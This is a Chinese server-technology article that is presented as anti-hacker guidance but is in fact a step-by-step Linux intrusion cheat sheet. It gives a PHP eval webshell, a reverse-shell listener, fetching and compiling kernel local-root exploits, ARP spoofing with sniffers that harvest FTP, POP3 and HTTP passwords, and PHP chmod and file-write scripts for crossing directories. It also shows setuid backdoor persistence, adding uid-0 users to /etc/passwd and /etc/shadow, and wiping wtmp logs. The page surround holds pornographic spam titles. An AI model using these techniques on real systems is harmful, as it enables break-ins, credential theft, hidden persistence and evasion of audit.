国产片侵犯亲女视频播放_亚洲精品二区_在线免费国产视频_欧美精品一区二区三区在线_少妇久久久_在线观看av不卡

服務器之家:專注于服務器技術及軟件下載分享
分類導航

Linux|Centos|Ubuntu|系統進程|Fedora|注冊表|Bios|Solaris|Windows7|Windows10|Windows11|windows server|

香港云服务器
服務器之家 - 服務器系統 - Linux - Linux入侵常用命令之防黑客示例代碼

Linux入侵常用命令之防黑客示例代碼

2022-03-09 16:47Mr.Z Linux

這篇文章主要給大家介紹了關于Linux入侵常用命令之防黑客的相關資料,文中通過示例代碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友們下面隨著小編來一起學習學習吧

前言

linux權限多設的比較松的其實,但有的虛擬機還是不能跨目錄訪問的。在提不了權的情況下,試試如下代碼吧。運氣好的話說不定就跨過去了。下面話不多說了,來一起看看詳細的介紹吧。

寫個php一句話后門上去:

?
1
2
[jobcruit@wa64-054 rankup_log]$ echo -e "<?php @eval(\$_POST[md5])?>" >rankuplog_time.php
[jobcruit@wa64-054 rankup_log]$ cat rankuplog_time.php

1、linux的想著先跨站

shell瀏覽目標站不行,命令行下輸入:

?
1
ls -la /www.users/

2、溢出提權

?
1
# python –c ‘impotr pty;pty.spawn(“/bin/sh”);

來得到交互的Shell,一般的系統都默認安裝python

輸入id
    bash-3.2$ id
    uid=529(zeicom) gid=525(zeicom) groups=525(zeicom)
    bash-3.2$
    這里uid=529(zeicom)還不是root權限,
    輸入uname –r
    返回:2.6.18-164.11.1.el5PAE

Linux提權大致可分為,第三方軟件漏洞、本地信任特性、內核溢出

找對應的exp, 這里地址整理很齊全可以這里下

http://tools.90sec.org/ 
http://sebug.net/paper/linux_exp/
http://x73.cc/bitch/exp/ 
http://www.exploit-db.com/search/

命令輸入pwd,這個命令是顯示當前目錄,

先看能不能編譯  gcc -help

當前目錄就是shell的目錄,我在shell上傳2.c

反彈shell  到外網自己機器的12345端口

上外網服務器 本地監聽 nc -lvvp 12345

一般都能得到一個apache交互的shell 有時候又不行

這時候

?
1
2
3
4
5
6
7
8
9
10
11
# python -c 'impotr pty;pty.spawn("/bin/sh");'
 cd /tmp 進入tmp目錄
 mkdir Papers 創建一個Papers的目錄 Papers不顯眼
 cd Papers 進入 Papers目錄
 pwd  查看當前目錄
 然后命令輸入
 wget 下載exp
 gcc –o 2 2.c //把2.c編譯成可執行文件 g++ keio.cc -o keio
 chmod +x 2 //給2有執行權限
 ./2  //執行2, 溢出
 gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

確定arpsniffer.c需要先裝pcap和 libnet。

?
1
2
3
4
5
6
7
rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm
 wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz?modtime=1072656000&big_mirror=0
 tar zxvf libpcap-0.8.1.tar.gz
 cd libpcap-0.8.1
 ./configure
 make
 make install

重新編譯arpsniffer.c

?
1
gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

這次沒報錯,編譯成功。

?
1
./arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254

下面開始欺騙,由于是服務器端,因此我們欺騙網關:(網絡環境如下,郵件服務器ip:192.168.0.11 網關:192.168.0.1 本機:192.168.0.77)

?
1
./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110

在另一個登錄里面用tcpdump監聽下

?
1
tcpdump -i eth0 host 192.168.0.11

發現有數據,把監聽的數據存在文件里面:

?
1
tcpdump -i eth0 host 172.16.0.12 -w pop.txt

10分鐘后停止,在SecureCRT下用sz命令下載pop.txt到本地,然后用Ethereal分析。

下面我們就可以用linsniffer監聽我們想要的用戶名和密碼了。

先修改linsniffer.c:根據自己的需求監聽相應的應用密碼。我的如下:

?
1
2
3
4
5
6
7
8
9
10
11
if(ntohs(tcp->dest)==21) p=1; /* ftp */
 if(ntohs(tcp->dest)==22) p=1; /* ssh for comparison added for example only comment out if desired*/
 if(ntohs(tcp->dest)==23) p=1; /* telnet */
 if(ntohs(tcp->dest)==80) p=1; /* http */
 if(ntohs(tcp->dest)==110) p=1; /* pop3 */
 if(ntohs(tcp->dest)==513) p=1; /* rlogin */
 if(ntohs(tcp->dest)==106) p=1; /* poppasswd */
 [root@bbs111 root]# gcc -o linsniffer linsniffer.c
 In file included from /usr/include/linux/tcp.h:21,
 from linsniffer.c:32:
 /usr/include/asm/byteorder.h:6:2: warning: #warning using private kernel header; include <endian.h> instead!

不用管警告,直接運行編譯后的linsniffer即可。

?
1
[root@bbs111 root]# ./linsniffer

用戶名和密碼都自動存到了tcp.log下。

3、利用跨站代碼

linux不提權跨目錄訪問的代碼

linux權限多設的比較松的其實,但有的虛擬機還是不能跨目錄訪問的。

在提不了權的情況下,試試如下代碼吧。運氣好的話說不定就跨過去了。

代碼如下:

?
1
2
3
4
5
$path = stripslashes($_GET['path']);
 $ok = chmod ($path , 0777);
 if ($ok == true)
 echo CHMOD OK , Permission editable file or directory. Permission to write;
 ?>

把上面代碼保存為tmdsb.PHP

然后訪問http://www.tmdsb.com/tmdsb.php?path=../../要跨的目錄/index.php

這里的index.PHP是要修改權限的文件。

收集的另一個exp:

把下面的代碼保存為exp.PHP

代碼:

?
1
2
3
4
5
6
7
@$filename = stripslashes($_POST['filename']);
 @$mess = stripslashes($_POST['mess']);
 $fp = @fopen({$_POST['filename']}, 'a');
 @fputs($fp,$mess
 );
 @fclose($fp);
 ?>

4.2.618最終Linux Kernel < 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)這個0day溢出成功

udev提權

換了個udev提權,適用于內核范圍為2.6.*。

還是上傳文件至服務器shell所在目錄,執行命令ls,發現文件已經躺在那里面了,之后賦予exp執行權限。

?
1
2
3
chmod +x pwnkernel.c
 chmod +x wunderbar_emporium.sh
 chmod +x exploit.c

   之后執行溢出./w*

成功溢出,root權限。

之后就是留下一個后門~ 添加一個root權限用戶俺也不介意。。。(useradd -u 0 -o "username")

依次輸入命令

?
1
2
3
4
5
6
7
8
9
cd /tmp
 sh-3.1# ls /lib/ld-linux*
 /lib/ld-linux.so.2
 sh-3.1# cp /lib/ld-linux.so.2 /tmp/.str1ven
 sh-3.1# ls -l .str1ven
 -rwxr-xr-x 1 root root 121684 07-08 21:13 .str1ven
 sh-3.1# chmod +s .str1ven
 sh-3.1# ls -l .str1ven
 -rwsr-sr-x 1 root root 121684 07-08 21:13 .str1ven

成功建立一個后門,退出root,執行./.str1ven `which whoami`,又成功獲取root權限~~

cat /etc/passwd 查看linux用戶

cat /etc/shadow 查看用戶密碼需要root權限

cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表網卡號 查看所在網卡的ip信息

ifconfig 查看本機ip信息

cat /etc/resolv.conf 查看DNS信息

bash -i 在反彈的shell中使用可以直觀顯示命令

bash prompt: 當你以普通限權用戶身份進入的時候,一般你會有一個類似bash$的prompt。當你以
Root登陸時,你的prompt會變成bash#。

系統變量 : 試著echo "$USER / $EUID" 系統應該會告訴你它認為你是什么用戶。
echo 1>/proc/sys/net/ipv4/if_forward是不是你寫錯了,應該是echo 1>/proc/sys/net/ipv4/ip_forward,

vim /proc/sys/net/ipv4/ip_forward 吧,默認是0,也就是內核不進行數據包過濾,改為1 ,讓內核對數據包進行filter處理!

netstat -an |grep LISTEN |grep :80 查看端口

?
1
2
service --status-all | grep running
service --status-all | grep http

查看運行服務

lsb_release -a 查看系統版本

重啟ssh服務 :

?
1
2
3
4
/usr/sbin/sshd stop/
usr/sbin/sshd start
ssd_config文件里
PasswordAuthentication no,

將其改為

PasswordAuthentication yes

遠程ssh才可登錄

否則顯示Access denied

其中Usepam yes可能用來建立pam方式login,比如從其它linux主機ssh到服務端,如果關閉,則不能打開.

su的菜鳥用法

先chomod 777 /etc/passwd

然后修改bin用戶的gid和uid為0

然后passwd設置bin的密碼

然后cp /bin/bash /sbin/nologin

然后su的時候su - bin就可以到rootshell了。

這個原理就是當ssh不允許root用ssh終端登陸的時候,我們又不知道root密碼的一種很菜鳥的做法。

還可以這樣

?
1
2
3
4
sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd
 gcc prtcl2.c –o local –static –Wall
 echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd
 echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

清空last記錄 cp /dev/null /var/log/wtmp

-----

dd if=/dev/zero of=yourfile bs=10M count=10 建立一個100m的大文件在利用Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit提權的時候要用到的

/etc/init.d/ssh start    開22端口

/etc/ssh/sshd_config SSH服務配置文件

總結

以上就是這篇文章的全部內容了,希望本文的內容對大家的學習或者工作具有一定的參考學習價值,如果有疑問大家可以留言交流,謝謝大家對服務器之家的支持。

原文鏈接:https://mp.weixin.qq.com/s/Pa5Zf-mfB2LyI8z5AkR6uw

延伸 · 閱讀

精彩推薦
520
Weibo Article 1 Weibo Article 2 Weibo Article 3 Weibo Article 4 Weibo Article 5 Weibo Article 6 Weibo Article 7 Weibo Article 8 Weibo Article 9 Weibo Article 10 Weibo Article 11 Weibo Article 12 Weibo Article 13 Weibo Article 14 Weibo Article 15 Weibo Article 16 Weibo Article 17 Weibo Article 18 Weibo Article 19 Weibo Article 20 Weibo Article 21 Weibo Article 22 Weibo Article 23 Weibo Article 24 Weibo Article 25 Weibo Article 26 Weibo Article 27 Weibo Article 28 Weibo Article 29 Weibo Article 30 Weibo Article 31 Weibo Article 32 Weibo Article 33 Weibo Article 34 Weibo Article 35 Weibo Article 36 Weibo Article 37 Weibo Article 38 Weibo Article 39 Weibo Article 40
主站蜘蛛池模板: 久久精品一区二区三区中文字幕 | 亚洲成av人片在线观看无 | 超碰一区二区三区 | 二区视频| 日韩精品在线免费视频 | 国产精品一区二区在线观看 | 日本视频一区二区三区 | 日韩h视频 | 理论电影在线 | 最新国产在线视频 | 亚洲一区中文字幕在线观看 | 久久精品国产免费 | 午夜社区 | 国产日韩精品视频 | 精品久久一区二区三区 | 久久国产精品视频 | 成人在线免费看视频 | 亚洲欧美综合精品久久成人 | 91国产精品 | 日韩精品免费在线观看 | 亚洲伊人久久综合 | 亚洲三级在线 | 亚洲精品久久久久久久久久久久久 | 成人精品久久久 | 国产免费自拍 | 99视频精品在线 | 亚洲综合网站 | 欧美一级二级三级 | 涩涩涩久久久成人精品 | 黄色片免费在线观看 | 国产尤物av| 日韩精品一区二区三区在线播放 | 日韩成人片 | 国产精品欧美日韩在线观看 | 久久99精品久久久 | 欧洲精品码一区二区三区免费看 | 这里只有精品在线播放 | 欧美狠狠操| 日本中文字幕视频 | 人人干天天干 | 精品在线一区 |